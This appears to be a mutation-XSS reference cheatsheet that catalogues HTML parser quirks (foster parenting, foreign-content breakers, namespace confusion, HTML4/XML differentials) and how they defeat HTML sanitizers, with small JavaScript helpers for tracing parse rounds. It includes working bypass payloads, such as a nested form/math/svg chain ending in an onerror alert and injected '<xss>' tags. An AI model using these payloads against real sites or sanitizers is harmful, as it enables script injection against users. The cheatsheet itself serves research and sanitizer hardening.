mXSS cheatsheet

This cheatsheet is a curated list of mXSS (mutation XSS) examples: unexpected mutations caused by browser quirks in HTML parsing. Instead of sifting through the roughly 1,500-page official spec, use the examples below to see these behaviors at a glance.

Contributions to this list are very welcome. Feel free to open issues on the repository if you would like to see more information on a specific topic, or a pull request if you are already aware of additional information. Links to public write-ups are appreciated when adding info.

The project is maintained by the Sonar R&D team. Find XSS in your code (and much more) with SonarCloud, free for open-source projects!

HTML namespace

select

Disallowed elements inside select are dropped: <select><a> → <select></select>
The exceptions are <select>, <input>, <keygen>, and <textarea>, which close the select instead: <select><style><input><a> → <select></select><input><a></a>

form

Cannot have another form as a descendant; the nested form start tag is ignored: <form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2 → <form id="form1">INSIDE_FORM1INSIDE_FORM2</form>
Bypass: <form id="outer"><div></form><form id="inner"><input> → (first parse) <form id="outer"><div><form id="inner"><input></form></div></form> → (reparse) <form id="outer"><div><input></div></form>
Can craft payloads that will mutate even after the second reparsing: <form id="outer"><math><mtext></form><form id="inner"><mglyph><svg><mtext><form id="outer"><mi></form><form id="inner"><mglyph><desc><xmp><img src=x onerror=alert(1)>
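
The arrows in this cheatsheet each stand for one parse-and-serialize round. A minimal sketch of a helper that records those rounds follows. The names `mutationChain` and `domParserRoundTrip` are hypothetical, and the parser is passed in as a function so that any parser or sanitizer can be plugged in. The DOMParser-based variant only works in a browser and parses with scripting disabled, so its results may differ from `innerHTML` or document rendering.

```javascript
// Repeatedly parse and serialize markup, recording every distinct stage.
// `parseAndSerialize` is an assumed injection point: any function that takes
// an HTML string and returns the serialized result of parsing it.
function mutationChain(html, parseAndSerialize, maxRounds = 5) {
  const stages = [html];
  for (let i = 0; i < maxRounds; i++) {
    const previous = stages[stages.length - 1];
    const next = parseAndSerialize(previous);
    if (next === previous) break; // fixed point: no further mutation
    stages.push(next);
  }
  return stages;
}

// Browser-only round trip (full-document parsing, scripting disabled).
function domParserRoundTrip(html) {
  const doc = new DOMParser().parseFromString(html, "text/html");
  return doc.body.innerHTML;
}

// Example call in a browser console:
// mutationChain('<form id="outer"><div></form><form id="inner"><input>', domParserRoundTrip);
```

A chain longer than two entries means the markup kept changing after the first parse, which is the property mXSS payloads rely on.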

table

Disallowed elements are moved before the table (foster parenting): <table><a> → <a></a><table></table>
Can be used to enclose disallowed elements in one another
- <p><table><xmp> → <p><xmp></xmp><table></table></p> → <p></p><xmp></xmp><table></table>
- <a><mglyph><table><a> → <a><mglyph><a></a><table></table></mglyph></a> → <a><mglyph></mglyph><a></a><table></table></a>
- <p><table><ul> → <p><ul></ul><table></table></p> → <p></p><ul></ul><table></table><p></p>
- And more…
Table-only elements such as tbody, tr, and td are dropped when they appear outside a table

a

Cannot be the child of another a element. Bypass via table element: <a id=1><table><a id=2> → <a id="1"><a id="2"></a><table></table></a> → <a id="1"></a><a id="2"></a><table></table>
Also <a id=1><audio>aa<altglyphdef><animatecolor><filter><fieldset><a id=2></fieldset></a>

headings

Headings cannot be direct children of another heading, e.g.: <h1><h2> → <h1></h1><h2></h2>
Bypass, <h1><a><h2></a> → <h1><a></a><h2><a></a></h2></h1> → <h1><a></a></h1><h2><a></a></h2>

noscript

Parsed differently depending on whether scripting is enabled. Scripting is disabled when parsing via DOMParser.
JS enabled (content is raw text): <noscript><a> → <noscript><a></noscript>
JS disabled (content is parsed as HTML): <noscript><a> → <noscript><a></a></noscript>

br and p

Are the only elements that can be created by an end tag alone: </p> → <p></p>, </br> → <br>
Elements that end a p element: address, article, aside, blockquote, center, details, dialog, dir, div, dl, fieldset, figcaption, figure, footer, header, hgroup, main, menu, nav, ol, p, search, section, summary, ul, pre, listing, plaintext

plaintext

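plaintext cannot be closed in the HTML namespace, but when it is foster-parented out of a table, the serialized output shows a closed plaintext followed by the table, which is still created: <table><plaintext><a> → <plaintext><a></plaintext><table></table>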

textarea

Character references in the content are decoded
Comments are not parsed inside textarea; comment markup is kept as text: <textarea><!-- still text --></textarea>

Active formatting elements

List of elements: a, b, big, code, em, font, i, nobr, s, small, strike, strong, tt, and u
Active formatting elements might get duplicated during parsing round trips when the DOM tree changes (see “the list of active formatting elements” in the HTML Standard)
For example: <li><a><table><li>t → <li><a><li>t</li><table></table></a></li> → <li><a></a></li><li><a>t</a></li><table></table>

NULL byte

A NULL byte in an element name is replaced with U+FFFD (char code 65533)

a=new window.DOMParser().parseFromString(`<a\x00 id="test">`,"text/html");
a.querySelector(`#test`).tagName.substr(1).charCodeAt() == 65533;
>>> true

is attribute

The is attribute is still serialized after it has been removed from the element

a=new DOMParser().parseFromString('<a is="to-delete">', "text/html");
a.body.firstChild.removeAttribute("is");
a.getRootNode().body.firstChild;
>>> <a></a>
a.getRootNode().body.firstChild.outerHTML;
>>> '<a is="to-delete"></a>'

comments

When a comment is incorrectly opened (<!, </, <?, <!-), the first > that follows closes the comment:
```
<! comment > outside of comment

```

SVG namespace

HTML integration points

foreignObject, desc, and title elements

image element

image is allowed in svg, but in HTML it is changed to img, which is a foreign content breaker

MATHML namespace

MathML text integration points

mi, mo, mn, ms, and mtext elements

annotation-xml element

Can embed the SVG namespace in MathML only if svg is a direct descendant of annotation-xml or inside an HTML integration point: <math><annotation-xml><svg> works, but <math><annotation-xml><x><svg> does not
Is an HTML integration point if the encoding attribute is set to text/html or application/xhtml+xml

`mglyph`/`malignmark` elements

If an mglyph or malignmark tag is a direct descendant of a MathML text integration point (mi, mo, mn, ms, mtext), the element and its descendants stay in the MathML namespace
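
The integration points listed for the SVG and MathML namespaces can be sketched as a small classifier. This is only an illustration: `integrationPointKind`, `SVG_NS`, and `MATHML_NS` are hypothetical names, and the grouping follows the HTML Standard's terms, where mi, mo, mn, ms, and mtext are "MathML text integration points" and annotation-xml with a matching encoding is an "HTML integration point".

```javascript
const SVG_NS = "http://www.w3.org/2000/svg";
const MATHML_NS = "http://www.w3.org/1998/Math/MathML";

// Returns "html", "mathml-text", or null for an element described by its
// namespace URI, local name, and an optional plain object of attributes.
function integrationPointKind(namespace, localName, attributes = {}) {
  if (namespace === SVG_NS) {
    return ["foreignObject", "desc", "title"].includes(localName) ? "html" : null;
  }
  if (namespace === MATHML_NS) {
    if (["mi", "mo", "mn", "ms", "mtext"].includes(localName)) {
      return "mathml-text";
    }
    if (localName === "annotation-xml") {
      // The encoding value is compared ASCII case-insensitively.
      const encoding = String(attributes.encoding || "").toLowerCase();
      if (encoding === "text/html" || encoding === "application/xhtml+xml") {
        return "html";
      }
    }
  }
  return null;
}
```

For example, `integrationPointKind(MATHML_NS, "annotation-xml", { encoding: "text/html" })` returns `"html"`, while the same element without an encoding attribute returns `null`.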

Foreign content breakers

The following tags

b, big, blockquote, body, br, center, code, dd, div, dl, dt, em, embed, h1, h2, h3, h4, h5, h6, head, hr, i, img, li, listing, menu, meta, nobr, ol, p, pre, ruby, s, small, span, strong, strike, sub, sup, table, tt, u, ul, var

The `font` element

Counts as a foreign content breaker only when it has at least one of the attributes color, face, or size

The `head` and `body` element

Are also foreign content breakers, and are dropped when parsed inside the body, e.g.: <svg><body><a> → <svg></svg><a></a>
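
The rules in this section can be sketched as a simple lookup, which may help when checking whether a sanitizer and the browser agree on where foreign content ends. The function and constant names are hypothetical, and the tag list is copied from this cheatsheet.

```javascript
// Start tags from the list above that break out of SVG/MathML content.
const BREAKING_TAGS = new Set([
  "b", "big", "blockquote", "body", "br", "center", "code", "dd", "div",
  "dl", "dt", "em", "embed", "h1", "h2", "h3", "h4", "h5", "h6", "head",
  "hr", "i", "img", "li", "listing", "menu", "meta", "nobr", "ol", "p",
  "pre", "ruby", "s", "small", "span", "strong", "strike", "sub", "sup",
  "table", "tt", "u", "ul", "var",
]);

// font only breaks foreign content when one of these attributes is present.
const FONT_BREAKING_ATTRS = ["color", "face", "size"];

function breaksForeignContent(tagName, attributeNames = []) {
  const name = tagName.toLowerCase();
  if (name === "font") {
    return attributeNames.some((attr) =>
      FONT_BREAKING_ATTRS.includes(attr.toLowerCase())
    );
  }
  return BREAKING_TAGS.has(name);
}
```

For instance, `breaksForeignContent("font", ["size"])` is `true`, while `breaksForeignContent("font", ["id"])` and `breaksForeignContent("a")` are both `false`.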

Browser specific

Document fragment parsing

JavaScript APIs that use fragment parsing: innerHTML, insertAdjacentHTML, etc.
Non-fragment parsing examples: an iframe’s srcdoc, document rendering
Firefox (fragment parsing): <svg><div> → <svg><div></div></svg> (applies to all breaking foreign content elements, not only div)
Other browsers: <svg><div> → <svg></svg><div></div> (the expected result)

HTML5 vs HTML4 / XML

RCDATA/RAWTEXT elements

HTML introduced RCDATA and RAWTEXT elements. If the sanitizer uses an XML-style parser, an attacker can bypass sanitization with a payload such as: <noframes><style></noframes><xss></style></noframes>

Comments

According to the XML specification (XHTML), comments must end with the characters -->. The HTML specification, on the other hand, states that a comment’s text “must not start with the string >, nor start with the string ->”.
```
Input: <p></p>
HTML4 output: 
```
This can be done with either <!--> or <!--->, both of which an HTML5 parser treats as a complete, empty comment.

Foreign content elements

HTML5 introduced two foreign elements (math and svg) that follow different parsing rules than HTML. Parsing with PHP, for example, does not take this into account, which causes further parsing differentials and sanitizer bypasses such as: <svg><p><style></style>

DOCTYPE element

The !DOCTYPE element in XML/XHTML is more complex allowing more characters and element nesting than in HTML5. In contrast, the HTML doctype ends with the first occurrence of the “greater than” sign >. The following payload can be used if the parser doesn’t follow HTML5’s DOCTYPE rules:
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTDHTML4.01//EN" "><xss>">
<!DOCTYPE HTML SYSTEM "><xss>">
```

Element name starting with underscore

According to the XML specification “Element names must start with a letter or underscore”, unlike HTML, where tag names must start with an ASCII letter.
```
Input: <p><_test/></p>
HTML output: <p>&lt;_test/&gt;</p>
XML output: <p><_test/></p>
```

Processing instruction

XML supports processing instructions, while HTML creates a comment when ? follows the < character, and that comment ends at the first >. If the sanitizer accepts processing instructions, the following payload can be used: <?x --><xss> ?>
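
Both the DOCTYPE and the processing-instruction payloads rely on the same HTML5 behavior: the construct ends at the first >, even inside quotes. A rough sketch of that split, using a hypothetical helper name, shows which part of a payload is left over to be parsed as regular markup. It only models these two constructs and is not a general HTML tokenizer.

```javascript
// Split markup at the first ">" the way an HTML5 parser ends a DOCTYPE or a
// "<?"-style bogus comment. `construct` is the part consumed by the DOCTYPE
// or comment; `rest` is what goes on to be parsed as ordinary markup.
function splitAtFirstGreaterThan(markup) {
  const end = markup.indexOf(">");
  if (end === -1) {
    return { construct: markup, rest: "" };
  }
  return {
    construct: markup.slice(0, end + 1),
    rest: markup.slice(end + 1),
  };
}

// Log the leftover markup for the two payload shapes discussed above.
console.log(splitAtFirstGreaterThan("<?x --><xss> ?>").rest);
console.log(splitAtFirstGreaterThan('<!DOCTYPE HTML SYSTEM "><xss>">').rest);
```

In both cases the leftover part begins with `<xss>`, which an XML-style parser would have kept inside the processing instruction or the quoted DOCTYPE identifier.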

Entities decoding

In the content of noscript

In the content of style only in svg/mathML namespaces

Documentation links

Integration points: HTML Standard

Breaking foreign content tags: HTML Standard

RCDATA/RAWTEXT elements: HTML Standard

Serializing HTML fragments: HTML Standard

Element types: HTML Standard